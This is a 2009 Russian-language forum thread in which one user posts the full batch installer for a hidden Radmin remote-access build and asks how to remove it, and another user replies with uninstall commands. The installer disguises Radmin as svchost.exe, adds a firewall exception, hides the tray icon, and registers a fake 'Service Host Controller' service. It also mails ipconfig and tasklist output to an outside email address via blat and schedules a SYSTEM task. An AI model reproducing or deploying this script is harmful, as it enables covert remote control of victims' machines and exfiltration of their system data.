Подчистка скрытого Radmin'a bat-ом

Discussion in 'Безопасность и Анонимность' started by the_apx, 8 Dec 2009.

  1. the_apx

    the_apx New Member

    Joined:
    8 Dec 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Как удалить установленную скрытую сборку Radmin'a bat файлом?

    В bat файле установки стоит команда подчистки файлов распакованных самой сборкой посли их копирования в Windows и System32.

    А как будет выглядеть текст bat файла который "подчистит" за собой эти файлы из каталогов windows и system32? Тоесть автоматизировать это дело) Чтото вроде таблетки.

    Буду весьма благодарен за помощь)

    Текст bat файла сборки:
    Code:
    cmdow @ /HID
    
    
    copy /y "blat.exe" "%SYSTEMROOT%/system32/blat.exe"
    copy /y "blat.lib" "%SYSTEMROOT%/system32/blat.lib"
    copy /y "blat.dll" "%SYSTEMROOT%/system32/blat.dll"
    copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe" 
    copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"
    copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"
    
    netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE
    
    REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
    REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f
    
    "%SYSTEMROOT%/svchost.exe" /install /silence
    "%SYSTEMROOT%/svchost.exe" /start
    
    %SYSTEMROOT%/system32/blat.exe -install -server mail.ru -port xxxx -f [email protected] -u user -pw pass
    
    ipconfig /all > %systemroot%/system32/ip.txt
    tasklist > %systemroot%/system32/task.txt
    
    blat.exe %systemroot%/system32/ip.txt -to [email protected] 
    blat.exe %systemroot%/system32/task.txt -to [email protected]
    
    schtasks /create /tn "security" /sc minute /mo 15 /ru "NT AUTHORITY\SYSTEM" /tr %SYSTEMROOT%/system32\ip.bat
    
    
    del cmdow.exe
    del blat.exe
    del blat.lib
    del blat.dll
    del raddrv.dll
    del admdll.dll
    del svchost.exe
    del install.bat
    
     
  2. cheater_man

    cheater_man Member

    Joined:
    13 Nov 2009
    Messages:
    651
    Likes Received:
    44
    Reputations:
    7
    "%SYSTEMROOT%/svchost.exe" /stop
    "%SYSTEMROOT%/svchost.exe" /uninstall /silence

    del /f /q "%SYSTEMROOT%/svchost.exe"
    del /f /q "%SYSTEMROOT%/raddrv.dll"
    del /f /q "%SYSTEMROOT%/admdll.dll"

    reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f